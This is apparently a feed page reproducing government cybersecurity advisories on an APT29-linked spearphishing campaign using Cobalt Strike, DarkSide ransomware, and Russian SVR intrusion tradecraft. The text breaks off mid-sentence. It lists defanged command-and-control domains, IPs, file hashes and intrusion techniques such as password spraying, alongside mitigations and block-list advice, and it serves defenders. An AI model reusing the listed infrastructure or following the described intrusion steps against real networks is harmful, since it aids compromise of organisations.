Threat Overview webpage CISA Alert TA15-314A: Compromised Web Servers and Web Shells - Threat Awareness and Guidance CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities CISA Alert AA20-275A: Potential for China Cyber Response to Heightened U.S.-China Tensions NSA Cybersecurity Advisory U/OO/179811-20: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities Revisions July 19, 2021: Initial version Updated July 19, 2021: Added note and STIX file This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-148A: Sophisticated Spearphishing Campaign Targets Government Organizations, IGOs, and NGOs
    by CISA on 28 Maggio 2021 at 10:29 pm

    Original release date: May 28, 2021 | Last revised: May 29, 2021SummaryThis Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are engaged in addressing a spearphishing campaign targeting government organizations, intergovernmental organizations (IGOs), and non-governmental organizations (NGOs). A sophisticated cyber threat actor leveraged a compromised end-user account from Constant Contact, a legitimate email marketing software company, to spoof a U.S.-based government organization and distribute links to malicious URLs.[1] CISA and FBI have not determined that any individual accounts have been specifically targeted by this campaign. Note: CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear).[2,3] However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI will update this Joint Cybersecurity Advisory as new information becomes available. Note: This Joint Cybersecurity Advisory contains information on tactics, techniques, and procedures (TTPs) and malware associated with this campaign. For more information on the malware, refer to Malware Analysis Report MAR-10339794-1.v1: Cobalt Strike Beacon. CISA and FBI urge governmental and international affairs organizations and individuals associated with such organizations to adopt a heightened state of awareness and implement the recommendations in the Mitigations section of this advisory. For a downloadable list of indicators of compromise (IOCs), refer to AA21-148A.stix, and MAR-10339794-1.v1.stix. Click here for a PDF version of this report. Technical DetailsBased on incident reports, malware collection, and trusted third-party reporting, CISA and FBI are engaged in addressing a sophisticated spearphishing campaign. A cyber threat actor leveraged a compromised end-user account from Constant Contact, a legitimate email marketing software company, to send phishing emails to more than 7,000 accounts across approximately 350 government organizations, IGOs, and NGOs. The threat actor sent spoofed emails that appeared to originate from a U.S. Government organization. The emails contained a legitimate Constant Contact link that redirected to a malicious URL [T1566.002, T1204.001], from which a malicious ISO file was dropped onto the victim’s machine. The ISO file contained (1) a malicious Dynamic Link Library (DLL) named Documents.dll [T1055.001], which is a custom Cobalt Strike Beacon version 4 implant, (2) a malicious shortcut file that executes the Cobalt Strike Beacon loader [T1105], and (3) a benign decoy PDF titled “Foreign Threats to the 2020 US Federal Elections” with file name “ICA-declass.pdf” (see figure 1). Note: The decoy file appears to be a copy of the declassified Intelligence Community Assessment pursuant to Executive Order 13848 Section 1(a), which is available at https://www.intelligence.gov/index.php/ic-on-the-record-database/results/1046-foreign-threats-to-the-2020-us-federal-elections-intelligence-community-assessment. Figure 1: Decoy PDF: ICA-declass.pdf Cobalt Strike is a commercial penetration testing tool used to conduct red team operations.[4] It contains a number of tools that complement the cyber threat actor’s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. The Cobalt Strike Beacon is the malicious implant that calls back to attacker-controlled infrastructure and checks for additional commands to execute on the compromised system [TA0011]. The configuration file for this Cobalt Strike Beacon implant contained communications protocols, an implant watermark, and the following hardcoded command and control (C2) domains: dataplane.theyardservice[.]com/jquery-3.3.1.min.woff2 cdn.theyardservice[.]com/jquery-3.3.1.min.woff2 static.theyardservice[.]com/jquery-3.3.1.min.woff2 worldhomeoutlet[.]com/jquery-3.3.1.min.woff2 The configuration file was encoded via an XOR with the key 0x2e and a 16-bit byte swap. For more information on the ISO file and Cobalt Strike Beacon implant, including IOCs, refer to Malware Analysis Report MAR-10339794-1.v1: Cobalt Strike Beacon. Indicators of Compromise The following IOCS were derived from trusted third parties and open-source research. For a downloadable list of IOCs, refer to AA21-148A.stix and MAR-10339794-1.v1.stix. URL: https[:]//r20.rs6.net/tn.jsp?f=Host IP: 208.75.122[.]11 (US)Owner: Constant Contact, Inc.Activity: legitimate Constant Contact link found in phishing email that redirects victims to actor-controlled infrastructure at https[:]//usaid.theyardservice.com/d/<target_email_address>   URL: https[:]//usaid.theyardservice.com/d/<target_email_address>Host IP: 83.171.237[.]173 (Germany)Owner: [redacted]First Seen: May 25, 2021Activity: actor-controlled URL that was redirected from https[:]//r20.rs6.net/tn.jsp?f=; the domain usaid[.]theyardservice.com was detected as a malware site; hosted a malicious ISO file "usaid[.]theyardservice.com"   File: ICA-declass.iso [MD5: cbc1dc536cd6f4fb9648e229e5d23361]File Type: Macintosh Disk ImageDetection: Artemis!7EDF943ED251, Trojan:Win32/Cobaltstrike!MSR, or other malwareActivity: ISO file container; contains a custom Cobalt Strike Beacon loader; communicated with multiple URLs, domains, and IP addresses   File: /d/ [MD5: ebe2f8df39b4a94fb408580a728d351f]File Type: Macintosh Disk ImageDetection: Cobalt, Artemis!7EDF943ED251, or other malwareActivity: ISO file container; contains a custom Cobalt Strike Beacon loader; communicated with multiple URLs, domains, and IP addresses   File: ICA-declass.iso [MD5: 29e2ef8ef5c6ff95e98bff095e63dc05]File Type: Macintosh Disk ImageDetection: Cobalt Strike, Rozena, or other malwareActivity: ISO file container; contains a custom Cobalt Strike Beacon loader; communicated with multiple URLs, domains, and IP addresses   File: Reports.lnk [MD5: dcfd60883c73c3d92fceb6ac910d5b80]File Type: LNK (Windows shortcut)Detection: Worm: Win32-Script.Save.df8efe7a, Static AI - Suspicious LNK, or other malwareActivity: shortcut contained in malicious ISO files; executes a custom Cobalt Strike Beacon loader   File: ICA-declass.pdf [MD5: b40b30329489d342b2aa5ef8309ad388]File Type: PDFDetection: undetectedActivity: benign, password-protected PDF displayed to victim as a decoy; currently unrecognized by antivirus software   File: DOCUMENT.DLL [MD5: 7edf943ed251fa480c5ca5abb2446c75]File Type: Win32 DLLDetection: Trojan: Win32/Cobaltstrike!MSR, Rozena, or other malwareActivity: custom Cobalt Strike Beacon loader contained in malicious ISO files; communicating with multiple URLs, domains, and IP addresses by antivirus software   File: DOCUMENT.DLL [MD5: 1c3b8ae594cb4ce24c2680b47cebf808]File Type: Win32 DLLDetection: Cobalt Strike, Razy, Khalesi, or other malwareActivity: Custom Cobalt Strike Beacon loader contained in malicious ISO files; communicating with multiple URLs, domains, and IP addresses by antivirus software   Domain: usaid[.]theyardservice.comHost IP: 83.171.237[.]173 (Germany)First Seen: May 25, 2021Owner: Withheld for Privacy PurposesActivity: subdomain used to distribute ISO file according to the trusted third party; detected as a malware site by antivirus programs   Domain: worldhomeoutlet.comHost IP: 192.99.221[.]77 (Canada)Created Date: March 11, 2020Owner: Withheld for Privacy Purposes by RegistrarActivity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software; associated with Cobalt Strike malware   Domain: dataplane.theyardservice[.]comHost IP: 83.171.237[.]173 (Germany)First Seen: May 25, 2021Owner: [redacted]Activity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software; observed in phishing, malware, and spam activity   Domain: cdn.theyardservice[.]comHost IP: 83.171.237[.]173 (Germany)First Seen: May 25, 2021Owner: Withheld for Privacy Purposes by RegistrarActivity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software   Domain: static.theyardservice[.]comHost IP: 83.171.237[.]173 (Germany)First Seen: May 25, 2021Owner: Withheld for Privacy PurposesActivity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software   IP: 192.99.221[.]77Organization: OVH SASResolutions: 7Geolocation: CanadaActivity: detected as a malware site; hosts a suspicious domain worldhomeoutlet[.]com; observed in Cobalt Strike activity   IP: 83.171.237[.]173Organization: Droptop GmbHResolutions: 15Geolocation: GermanyActivity: Categorized as malicious by antivirus software; hosted multiple suspicious domains and multiple malicious files were observed downloaded from this IP address; observed in Cobalt Strike and activity   Domain: theyardservice[.]comHost IP: 83.171.237[.]173 (Germany)Created Date: January 27, 2010Owner: Withheld for Privacy PurposesActivity: Threat actor controlled domain according to the trusted third party; categorized as suspicious by antivirus software; observed in Cobalt Strike activity Table 1 provides a summary of the MITRE ATT&CK techniques observed. Table 1: MITRE ATT&CK techniques observed Technique Title Technique ID Process Injection: Dynamic-link Library Injection T1055.001 Ingress Tool Transfer T1105 User Execution: Malicious Link T1204.001 Phishing: Spearphishing Link T1566.002 MitigationsCISA and FBI urge CI owners and operators to apply the following mitigations. Implement multi-factor authentication (MFA) for every account. While privileged accounts and remote access systems are critical, it is also important to ensure full coverage across SaaS solutions. Enabling MFA for corporate communications platforms (as with all other accounts) provides vital defense against these types of attacks and, in many cases, can prevent them. Keep all software up to date. The most effective cybersecurity programs quickly update all of their software as soon as patches are available. If your organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited. Implement endpoint and detection response (EDR) tools. EDR allows a high degree of visibility into the security status of endpoints and is can be an effective tool against threat actors.Note: Organizations using Microsoft Defender for Endpoint or Microsoft 365 Defense should refer to Microsoft: Use attack surface reduction rules to prevent malware infection for more information on hardening the enterprise attack surface. Implement centralized log management for host monitoring. A centralized logging application allows technicians to look out for anomalous activity in the network environment, such as new applications running on hosts, out-of-place communication between devices, or unaccountable login failures on machines. It also aids in troubleshooting applications or equipment in the event of a fault. CISA and the FBI recommend that organizations: Forward logs from local hosts to a centralized log management server—often referred to as a security information and event management (SIEM) tool. Ensure logs are searchable. The ability to search, analyze, and visualize communications will help analysts diagnose issues and may lead to detection of anomalous activity. Correlate logs from both network and host security devices. By reviewing logs from multiple sources, an organization can better triage an individual event and determine its impact to the organization as a whole. Review both centralized and local log management policies to maximize efficiency and retain historical data. Organizations should retain critical logs for a minimum of 30 days. Deploy signatures to detect and/or block inbound connection from Cobalt Strike servers and other post-exploitation tools. Implement unauthorized execution prevention by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications. Configure and maintain user and administrative accounts using a strong account management policy. Use administrative accounts on dedicated administration workstations. Limit access to and use of administrative accounts. Use strong passwords. For more information on strong passwords, refer to CISA Tip: Choosing and Protecting Passwords and National Institute of Standards (NIST) SP 800-63: Digital Identity Guidelines: Authentication and Lifecycle Management. Remove default accounts if unneeded. Change the password of default accounts that are needed. Disable all unused accounts. Implement a user training program and simulated attacks for spearphishing to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. RESOURCES Volexity Blog: Suspected APT29 Operation Launches Election Fraud Themed Phishing Campaigns | Volexity Microsoft Blog: New sophisticated email-based attack from NOBELIUM - Microsoft Security Microsoft Blog: Another Nobelium Cyberattack Contact InformationTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov. This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp/.   References [1] Microsoft Blog: New Sophisticated Email-Based Attack from NOBELIUM [2] Ibid. Volexity Blog: Suspected APT29 Operation Launches Election Fraud Themed Phishing Campaigns [4] MITRE ATT&CK: Cobalt Strike Revisions May 28, 2021: Initial version May 29, 2021: Added final sentence of first paragraph in Summary section This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
    by CISA on 11 Maggio 2021 at 7:00 pm

    Original release date: May 11, 2021 | Last revised: July 8, 2021SummaryThis Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of a ransomware attack affecting a critical infrastructure (CI) entity—a pipeline company—in the United States. Malicious cyber actors deployed DarkSide ransomware against the pipeline company’s information technology (IT) network.[1] At this time, there is no indication that the entity’s operational technology (OT) networks have been directly affected by the ransomware. CISA and FBI urge CI asset owners and operators to adopt a heightened state of awareness and implement the recommendations listed in the Mitigations section of this Joint Cybersecurity Advisory, including implementing robust network segmentation between IT and OT networks; regularly testing manual controls; and ensuring that backups are implemented, regularly tested, and isolated from network connections. These mitigations will help CI owners and operators improve their entity's functional resilience by reducing their vulnerability to ransomware and the risk of severe business degradation if impacted by ransomware. (Updated May 19, 2021): Click here for a STIX package of indicators of compromise (IOCs). Note: These IOCs were shared with critical infrastructure partners and network defenders on May 10, 2021. The applications listed in the IOCs were leveraged by the threat actors during the course of a compromise. Some of these applications might appear within an organization's enterprise to support legitimate purposes; however, these applications can be used by threat actors to aid in malicious exploitation of an organization's enterprise. CISA and FBI recommend removing any application not deemed necessary for day-to-day operations. (Updated July 08, 2021): Click here for downloadable IOCs associated with a sample of a DarkSide ransomware variant analyzed by CISA and FBI. Note: CISA and FBI have no evidence that this sample is related to the pipeline incident detailed in this CSA. This variant executes a dynamic-link library (DLL) program used to delete Volume Shadow copies available on the system. The malware collects, encrypts, and sends system information to the threat actor’s command and control (C2) domains and generates a ransom note to the victim. For more information about this variant, refer to Malware Analysis Report MAR-10337802-1.v1: DarkSide Ransomware.  Click here for a PDF version of this report. Technical DetailsNote: the analysis in this Joint Cybersecurity Advisory is ongoing, and the information provided should not be considered comprehensive. CISA and FBI will update this advisory as new information is available. After gaining initial access to the pipeline company’s network, DarkSide actors deployed DarkSide ransomware against the company’s IT network. In response to the cyberattack, the company has reported that they proactively disconnected certain OT systems to ensure the systems’ safety.[2] At this time, there are no indications that the threat actor moved laterally to OT systems. DarkSide is ransomware-as-a-service (RaaS)—the developers of the ransomware receive a share of the proceeds from the cybercriminal actors who deploy it, known as “affiliates.” According to open-source reporting, since August 2020, DarkSide actors have been targeting multiple large, high-revenue organizations, resulting in the encryption and theft of sensitive data. The DarkSide group has publicly stated that they prefer to target organizations that can afford to pay large ransoms instead of hospitals, schools, non-profits, and governments.[3],[4] According to open-source reporting, DarkSide actors have previously been observed gaining initial access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI) (Phishing [T1566], Exploit Public-Facing Application [T1190], External Remote Services [T1133]).[5],[6] DarkSide actors have also been observed using Remote Desktop Protocol (RDP) to maintain Persistence [TA0003].[7] After gaining access, DarkSide actors deploy DarkSide ransomware to encrypt and steal sensitive data (Data Encrypted for Impact [T1486]). The actors then threaten to publicly release the data if the ransom is not paid.[8],[9] The DarkSide ransomware uses Salsa20 and RSA encryption.[10] DarkSide actors primarily use The Onion Router (TOR) for Command and Control (C2) [TA0011] (Proxy: Multi-hop Proxy [1090.003]).[11],[12] The actors have also been observed using Cobalt Strike for C2.[13] MitigationsCISA and FBI urge CI owners and operators to apply the following mitigations to reduce the risk of compromise by ransomware attacks. Require multi-factor authentication for remote access to OT and IT networks. Enable strong spam filters to prevent phishing emails from reaching end users. Filter emails containing executable files from reaching end users. Implement a user training program and simulated attacks for spearphishing to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists. Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Limit access to resources over networks, especially by restricting RDP. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication. Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. Implement unauthorized execution prevention by:  Disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications. Implementing application allowlisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder. Monitor and/or block inbound connections from Tor exit nodes and other anonymization services to IP addresses and ports for which external connections are not expected (i.e., other than VPN gateways, mail ports, web ports). For more guidance, refer to Joint Cybersecurity Advisory AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor. Deploy signatures to detect and/or block inbound connection from Cobalt Strike servers and other post exploitation tools. CISA and FBI urge CI owners and operators to apply the following mitigations now to reduce the risk of severe business or functional degradation should their CI entity fall victim to a ransomware attack in the future. Implement and ensure robust network segmentation between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks. Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit industrial control system (ICS) protocols from traversing the IT network. Identify OT and IT network inter-dependencies and develop workarounds or manual controls to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans such as manual controls so that safety critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.  Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline. Implement regular data backup procedures on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. The data backup procedures should also address the following best practices: Ensure that backups are regularly tested. Store your backups separately. Backups should be isolated from network connections that could enable the spread of ransomware. It is important that backups be maintained offline as many ransomware variants attempt to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems to its previous state. Best practice is to store your backups on a separate device that cannot be accessed from a network, such as on an external hard drive. (See the Software Engineering Institute’s page on ransomware). Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server. Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred. Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images. Store source code or executables. It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases. Ensure user and process accounts are limited through account use policies, user account control, and privileged account management. Organize access rights based on the principles of least privilege and separation of duties. If your organization is impacted by a ransomware incident, CISA and FBI recommend the following actions: Isolate the infected system. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless.   Turn off other computers and devices. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that shared a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists. (See Before You Connect a New Computer to the Internet for tips on how to make a computer more secure before you reconnect it to a network.) Secure your backups. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware. Refer to Joint Cybersecurity Advisory: AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity for more best practices on incident response. Note: CISA and the FBI do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered. CISA and FBI urge you to report ransomware incidents to your local FBI field office. CISA offers a range of no-cost cyber hygiene services to help CI organizations assess, identify and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors. Resources CISA and MS-ISAC: Joint Ransomware Guide CISA: Ransomware page CISA Tip: Protecting Against Ransomware CISA: CISA Ransomware One-Pager and Technical Document CISA Insights: Ransomware Outbreak CISA: Pipeline Cybersecurity Initiative CISA Webinar: Combating Ransomware CISA: Cybersecurity Practices for Industrial Control Systems FBI: Incidents of Ransomware on the Rise National Security Agency (NSA): Stop Malicious Cyber Activity Against Connected Operational Technology Department of Energy: Oil and Natural Gas Subsector Cybersecurity Capability Maturity Model Transportation Security Agency: Pipeline Security Guidelines National Institute of Standards and Technology (NIST): Framework for Improving Critical Infrastructure Cybersecurity NIST: Ransomware Protection and Response NIST: Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events NIST: Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events NIST: Data Integrity: Recovering from Ransomware and Other Destructive Events NIST: Guide to Industrial Control Systems (ICS) Security Software Engineering Institute: Ransomware: Best Practices for Prevention and Response NIST Fact Sheet: How Do I Stay Prepared? Contact InformationVictims of ransomware should report it immediately to CISA at https://us-cert.cisa.gov/report, a local FBI Field Office, or U.S. Secret Service Field Office. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov. References [1] Colonial Pipeline Media Statement on Pipeline Disruption [2] Ibid [3] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M. [4] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign [5] BankInfo Security: FBI: DarkSide Ransomware Used in Colonial Pipeline Attack [6] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign [7] Ibid [8] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M [9] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign [10] McAfee: Threat Landscape Dashboard DarkSide – Ransomware [11] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M [12] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign [13] McAfee: Threat Landscape Dashboard DarkSide – Ransomware Revisions May 11, 2021: Initial Version May 12, 2021: Added additional resources May 19, 2021: Added IOCs July 8, 2021: Added MAR-10337802-1.v1 and associated IOCs This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders
    by CISA on 26 Aprile 2021 at 3:00 pm

    Original release date: April 26, 2021SummaryThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021. The FBI and DHS are providing information on the SVR’s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks. Click here for a PDF version of this report. Threat Overview SVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors’ ability to move within victim environments undetected. Beginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations. Technical DetailsSVR Cyber Operations Tactics, Techniques, and Procedures Password Spraying In one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a “low and slow” manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses. The organization unintentionally exempted the compromised administrator’s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts. The actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization. While the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization. During the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts.  Recommendations To defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including: Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations. Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization. Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes. Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts. Regularly review the organization’s password management program. Ensure the organization’s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts. Maintain a regular cadence of security awareness training for all company employees. Leveraging Zero-Day Vulnerability In a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials. The actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service. Following initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity. Recommendations To defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and: Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP. Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time. Require use of multi-factor authentication to access internal systems. Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools. WELLMESS Malware In 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI’s investigation revealed that following initial compromise of a network—normally through an unpatched, publicly-known vulnerability—the actors deployed WELLMESS. Once on the network, the actors targeted each organization’s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the ‘Resources’ section of this document. Tradecraft Similarities of SolarWinds-enabled Intrusions During the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR’s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR’s historic tradecraft. The FBI’s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions. Recommendations Although defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including: Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers. Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell. Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise. Using available public resources to identify credential abuse within cloud environments. Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices. While few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly “zero trust” architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation. General Tradecraft Observations SVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a 